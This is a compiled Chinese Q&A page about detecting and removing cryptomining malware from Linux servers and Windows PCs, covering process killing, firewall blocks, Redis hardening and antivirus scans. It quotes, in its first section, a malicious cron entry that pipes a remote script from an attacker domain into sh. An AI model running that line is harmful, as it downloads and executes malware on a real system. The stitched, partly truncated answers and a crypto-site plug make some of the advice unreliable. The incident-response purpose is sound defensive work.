怎么清除电脑挖矿程序

Ⅰ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

Ⅱ 怎样 删除 mineros.exe 这种挖矿程序

最近一台安装了Gitlab的服务器发生了高负载告警，Cpu使用情况如下：

让后登录到服务器，利用top查看CPU使用情况，这个叫minerd的程序消耗cpu较大，如下图所示：

这个程序并不是我们的正常服务程序，心里一想肯定被黑了，然后就搜索了一下这个程序，果真就是个挖矿木马程序，既然已经知道他是木马程序，那就看看它是怎么工作的，然后怎么修复一下后门。

这个程序放在/opt/minerd下，在确定跟项目不相关的情况下判断是个木马程序，果断kill掉进程，然后删除/opt下minerd文件。

展

Ⅲ 电脑好像中了JS网页挖矿木马了，怎么办

先用360安全卫士全盘木马查杀一下！如果不彻底
可以重启电脑，过四秒钟
按
F8按，
进入安全模式下用360系统急救箱它对各类流行的顽固木马查杀效果极佳，能够强力清除木马和可疑程序，并修复被感染的系统文件，抑制木马再生，修复系统功能！

Ⅳ tasklsv.exe挖矿病毒如何彻底清除

请勿访问陌生网站，在陌生网站浏览、下载很可能导致中毒。

1. 若电脑中存在木马或者病毒程序，安装一款安全软件（例如：电脑管家等）。使用安全软件进行扫描全盘即可发现病毒并删除。若无法处理或者出现错误请尝试备份重要资料后重新安装系统。

2. 若手机中存在木马或者病毒程序，安装一款安全软件（例如：手机管家等）。以手机管家为例，打开手机管家，点击主界面上的一键体检即可自动检测手机中存在的病毒，点击一键清除即可删除。

Ⅳ miner挖矿木马该怎么清除

miner挖矿木马这种病毒现在经常遇到，在一般情况下使用电脑管家的杀毒功能时无法查杀。

这时需要重启电脑按F8进入电脑的安全模式，在安全模式下，使用电脑管家的病毒查杀，给电脑杀毒，在一般情况下的杀毒软件可以查杀到此病毒。

miner挖矿木马是消耗用户的电脑资源，进行挖矿，导致用户电脑资源和性能变低，一般看不出来，但是显卡或CPU占用很高，是电脑后台自行消耗显卡与CPU资源的木马病毒。现在十分常见。

Ⅵ 挖矿病毒怎么处理

挖矿病毒处理步骤如下：

1、查看服务器进程运行状态查看服务器系统整体运行情况，发现名为kdevtmpfsi的挖矿进程大量占用系统CPU使用率。

2、查看端口及外联情况查看端口开放状态及外联情况，发现主机存在陌生外联行为。对该外部地址进行查询发现属于国外地址，进一步确定该进程为恶意挖矿进程：定位挖矿进程及其守护进程PID挖矿病毒kdevtmpfsi在运行过程中不仅会产生进程kdevtmpfsi。

6、查看redis日志通过查看redis配置文件/etc/redis.conf发现日志功能未开启。

7、查找敏感文件发现authorized_keys文件。

8、查看ssh日志文件查看ssh日志文件，发现大量登陆痕迹以及公钥上传痕迹。

Ⅶ 电脑被挖矿了怎么解决

用杀毒软件在安全模式解决 想彻底解决还是用Pe重装系统清除挖矿

Ⅷ 显卡bios被共享挖矿了咋办

杀毒软件或者是重装一下系统
投资者如果不知道电脑被别人挖矿怎么解决，可以首先打开任务管理器，这个时候看到内存应该是专用内存集指的就是某个进程当中的内存，事实上还会有一个共享内存集里面放着的便是关于共享的东西，主要就是看一下代码，如果说出现了问题，就可能是病毒用什么方式直接占据或者是隐藏的内存，这个时候可以直接更换系统或者是杀毒了。如果投资者不知道如何处理，可以来到OKLink浏览器上学习一下专业知识，在OKLink浏览器中可以了解主流货币的动向及价格，也可学习到一些专业知识。
二.如何查看电脑是否被挖矿1.挖矿主要就是用一些比较好的显卡，这样在挖矿的过程中效率可以更高一些，所以投资者在监看时只需要看一下GPU或者是CPU的使用情况，就可以发现回到主页面之后，可以直接右击开始按钮。然后在菜单里面点击任务管理器，进入管理器之后，先看一下运行程序当中的CPU使用率有没有过高。2.了解了电脑被别人挖矿怎么解决后，投资者一定要了解一下该怎么看。在任务管理器中可以直接点击性能这个选项，在进入选项之后可以点击下面的GPU，一般来说可以有两个，分别是集成的显卡和独立的。在正常情况下多办显卡显示的利用率都比较低，除了一些大型的游戏软件，才可以把独立的显卡给调出来。接着可以看独立显卡，一般在默认的情况下这种显卡根本用不到，在启动游戏时利用率会特别高，如果这个时候确实很高，那么投资者的电脑就是正在被挖矿中

Ⅸ 电脑被挖矿了怎么恢复！求助！（已经卸载并且将其杀毒）

重装一遍系统，就完全恢复了

任何挖坑都需要安装软件的，重装系统，这些软件都消失了
本质上挖坑，其实就是运行某个软件，如果不是本人安装，都是通过木马安装的

Ⅹ 中了挖矿木马，我是如何清理的

目前挖矿木马还没办法查杀，即使是2020年6月的现在，市面上所有的安全卫士都没办法识别出来。这个木马非常狡猾，通过局域网共享传播，感染之后会在本地生成一个合法程序（powershell命令形式的），然后木马程序会自动删除，这也是安全卫士没办法查杀的原因吧。我曾经翻过整个C盘，都没办法找出源文件，只能重装系统了。